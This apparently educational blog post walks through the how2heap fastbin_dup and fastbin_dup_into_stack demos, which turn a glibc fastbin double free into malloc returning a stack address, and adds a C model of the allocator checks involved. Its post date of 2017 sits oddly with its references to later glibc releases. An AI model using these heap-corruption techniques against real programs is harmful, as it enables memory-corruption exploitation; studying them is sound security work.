how2heap summary

Posted: 2017-12-08 01:22:52

Today let's work through how2heap. I skimmed it once before, but recently I realised there were still many details I was not clear on, so I am going back and debugging how2heap again from the start.

We'll take the examples in order.

0x01 fastbin_dup:

Source:

#include <stdio.h>
#include <stdlib.h>

int main()
{
    fprintf(stderr, "This file demonstrates a simple double-free attack with fastbins.\n");

    fprintf(stderr, "Allocating 3 buffers.\n");
    int *a = malloc(8);
    int *b = malloc(8);
    int *c = malloc(8);

    fprintf(stderr, "1st malloc(8): %p\n", a);
    fprintf(stderr, "2nd malloc(8): %p\n", b);
    fprintf(stderr, "3rd malloc(8): %p\n", c);

    fprintf(stderr, "Freeing the first one...\n");
    free(a);

    fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
    // free(a);

    fprintf(stderr, "So, instead, we'll free %p.\n", b);
    free(b);

    fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
    free(a);

    fprintf(stderr, "Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a);
    fprintf(stderr, "1st malloc(8): %p\n", malloc(8));
    fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
    fprintf(stderr, "3rd malloc(8): %p\n", malloc(8));
}

Next, let's run the program.

[screenshot of the program's output]

From the output we can see this is a double free against the fastbins. A fastbin is a LIFO singly linked list, and free() only checks whether the chunk being freed is the one currently at the head of its bin, so free(a), free(b), free(a) gets through even though a is freed twice. The bin then holds a -> b -> a (a's fd points to b and b's fd points back to a), so the following mallocs hand out a, b, a, b, a, ... in a cycle for as long as nothing written into those buffers overwrites the fd; you can try allocating a few more times to confirm. Note that this is the behaviour of pre-tcache glibc (2.25 and earlier), which is what how2heap exercised when this was written; glibc 2.26 added tcache, which takes chunks of this size first, and glibc 2.29 detects this double free outright with "free(): double free detected in tcache 2".

 

0x02 fastbin_dup_into_stack:

Source:

#include <stdio.h>
#include <stdlib.h>

int main()
{
    fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\n"
           "returning a pointer to a controlled location (in this case, the stack).\n");

    unsigned long long stack_var;

    fprintf(stderr, "The address we want malloc() to return is %p.\n", 8+(char *)&stack_var);

    fprintf(stderr, "Allocating 3 buffers.\n");
    int *a = malloc(8);
    int *b = malloc(8);
    int *c = malloc(8);

    fprintf(stderr, "1st malloc(8): %p\n", a);
    fprintf(stderr, "2nd malloc(8): %p\n", b);
    fprintf(stderr, "3rd malloc(8): %p\n", c);

    fprintf(stderr, "Freeing the first one...\n");
    free(a);

    fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
    // free(a);

    fprintf(stderr, "So, instead, we'll free %p.\n", b);
    free(b);

    fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
    free(a);

    fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
        "We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);
    unsigned long long *d = malloc(8);

    fprintf(stderr, "1st malloc(8): %p\n", d);
    fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
    fprintf(stderr, "Now the free list has [ %p ].\n", a);
    fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n"
        "so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
        "so that malloc will think there is a free chunk there and agree to\n"
        "return a pointer to it.\n", a);
    stack_var = 0x20;

    fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
    *d = (unsigned long long) (((char*)&stack_var) - sizeof(d));

    fprintf(stderr, "3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));
    fprintf(stderr, "4th malloc(8): %p\n", malloc(8));
}

Next, let's run the program.

[screenshot of the program's output]

The fourth malloc(8) returns our forged stack chunk as if it were heap memory. The steps that matter: after free(a), free(b), free(a) the bin holds a -> b -> a, so the first malloc hands back d == a while a is still queued in the bin, which means whatever we write through d becomes a's fd. We set stack_var = 0x20, because when malloc pops a chunk from a fastbin it checks that the chunk's size field belongs to that bin (any size from 0x20 to 0x2f maps to the same index) and aborts with "malloc(): memory corruption (fast)" otherwise; this is the only validation it performs, and the fd value itself is never checked. We then write the address of stack_var minus 8 into *d, i.e. into a's fd, so that the fake chunk's header starts 8 bytes before stack_var and stack_var lands exactly where the size field belongs. The third malloc pops a and leaves the fake chunk at the head of the bin, and the fourth returns (char *)&stack_var + 8, the "user data" of our fake chunk, so the program now treats a region of its own stack as a heap allocation.
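To make both mechanisms concrete, here is an added example written for this summary (it is not how2heap's code and not glibc's): a small 64-bit model of one fastbin on a fake heap, implementing only the two checks the two programs above depend on, the "fasttop" double-free check in free() and the size-class check on the popped chunk in malloc(). demo_fastbin_dup() walks through 0x01 (the back-to-back free(a) is rejected, free(a)/free(b)/free(a) is accepted, and the next six mallocs cycle a, b, a, b, a, b); demo_fastbin_dup_into_stack() walks through 0x02 and takes the forged size as a parameter, so it also shows which values get past the size check (0x20 to 0x2f pass, 0x40 or 0 are refused). All names (model_malloc, model_free, CHUNK_SZ, FASTBIN_IDX, ...) and the fake heap are this example's own assumptions; the abort messages quoted in the comments are the ones real glibc prints.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed 64-bit model of one glibc fastbin (pre-tcache, glibc < 2.26), the
 * 0x20 size class malloc(8) lands in. Written for this page, not glibc code; it
 * mirrors only the "fasttop" double-free check in free() and the size-class
 * check in malloc(). Layout as in glibc: size at +8, user data (fd when freed) at +16. */

#define CHUNK_SZ 0x20
#define FASTBIN_IDX 0                          /* fastbin_index(0x20) on 64-bit */

static uint8_t heap[4 * CHUNK_SZ];             /* stands in for the arena */
static size_t heap_top;                        /* bump pointer, like av->top */
static uint8_t *fastbin_head;                  /* av->fastbinsY[FASTBIN_IDX] */
static const char *last_error;                 /* where real glibc would abort */

static uint64_t *chunk_size(uint8_t *c) { return (uint64_t *)(c + 8); }
static uint8_t **chunk_fd(uint8_t *c)   { return (uint8_t **)(c + 16); }
static void *chunk2mem(uint8_t *c)      { return c + 16; }
static uint8_t *mem2chunk(void *p)      { return (uint8_t *)p - 16; }

/* chunksize() masks the three flag bits and fastbin_index() maps a 64-bit size
 * to its bin, so any size field from 0x20 to 0x2f selects bin 0. */
static int fastbin_index(uint64_t size) { return (int)((size & ~(uint64_t)7) >> 4) - 2; }

static void reset(void) {
    memset(heap, 0, sizeof heap);
    heap_top = 0; fastbin_head = NULL; last_error = NULL;
}

static void *model_malloc(void) {
    uint8_t *victim = fastbin_head;
    if (victim != NULL) {
        /* _int_malloc: abort if the popped chunk's size does not belong to this
         * bin. Nothing else, least of all where fd points, is validated. */
        if (fastbin_index(*chunk_size(victim)) != FASTBIN_IDX) {
            last_error = "malloc(): memory corruption (fast)";
            return NULL;
        }
        fastbin_head = *chunk_fd(victim);          /* pop: head = victim->fd */
        return chunk2mem(victim);
    }
    if (heap_top + CHUNK_SZ > sizeof heap) { last_error = "model heap exhausted"; return NULL; }
    uint8_t *c = heap + heap_top;                  /* carve from the top chunk */
    heap_top += CHUNK_SZ;
    *chunk_size(c) = CHUNK_SZ | 1;                 /* PREV_INUSE set, as on a real heap */
    return chunk2mem(c);
}

static int model_free(void *p) {
    uint8_t *c = mem2chunk(p);
    /* _int_free: the only double-free check for fastbins compares the chunk with
     * the current bin head ("double free or corruption (fasttop)"). */
    if (c == fastbin_head) { last_error = "double free or corruption (fasttop)"; return -1; }
    *chunk_fd(c) = fastbin_head;                   /* push: c->fd = old head */
    fastbin_head = c;
    return 0;
}

/* fastbin_dup: free(a) free(b) free(a) builds the cycle a -> b -> a -> ...
 * Fills out[] with the next six malloc results; returns 0 on success. */
static int demo_fastbin_dup(void *out[6]) {
    reset();
    void *a = model_malloc(), *b = model_malloc();
    (void)model_malloc();                          /* the third buffer, c */
    if (model_free(a) != 0) return -1;
    if (model_free(a) == 0) return -2;             /* back-to-back free(a) is caught */
    if (model_free(b) != 0) return -3;
    if (model_free(a) != 0) return -4;             /* a now sits behind b: accepted */
    for (int i = 0; i < 6; i++) out[i] = model_malloc();
    return 0;
}

/* fastbin_dup_into_stack: with the bin holding a -> b -> a, the first malloc
 * returns a while a is still queued behind b, so writing *d rewrites a->fd.
 * Returns 1 if malloc hands out stack_var + 8, 0 if the size check refuses it. */
static int demo_fastbin_dup_into_stack(uint64_t fake_size) {
    reset();
    uint64_t stack_region[4] = {0};
    uint64_t *stack_var = &stack_region[1];        /* will play the size field */
    void *a = model_malloc(), *b = model_malloc();
    (void)model_malloc();
    if (model_free(a) || model_free(b) || model_free(a)) return -1;
    uint8_t **d = model_malloc();                  /* d == a; bin is now b -> a */
    if ((void *)d != a) return -2;
    (void)model_malloc();                          /* takes b; bin is now a */
    *stack_var = fake_size;                        /* forged size field */
    *d = (uint8_t *)stack_var - 8;                 /* a->fd = fake chunk header on the stack */
    if (model_malloc() != a) return -3;            /* pops a, head = fake chunk */
    void *forged = model_malloc();                 /* pops the fake chunk if its size passes */
    if (forged == NULL) return 0;
    return forged == (void *)((uint8_t *)stack_var + 8) ? 1 : -4;
}

int main(void) {
    void *out[6];
    printf("fastbin_dup: rc=%d, next six mallocs:", demo_fastbin_dup(out));
    for (int i = 0; i < 6; i++) printf(" %p", out[i]);
    printf("\nfastbin_dup_into_stack: size 0x20 -> %d\n", demo_fastbin_dup_into_stack(0x20));
    int refused = demo_fastbin_dup_into_stack(0x40);
    printf("fastbin_dup_into_stack: size 0x40 -> %d (%s)\n", refused, last_error ? last_error : "ok");
    return 0;
}
```

Because the model checks the same two conditions as the real allocator and nothing more, it reproduces both attacks independently of the host's libc; on a tcache-enabled glibc the original how2heap programs above behave differently, so this is a convenient way to study the fastbin logic in isolation before moving to a matching glibc version.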

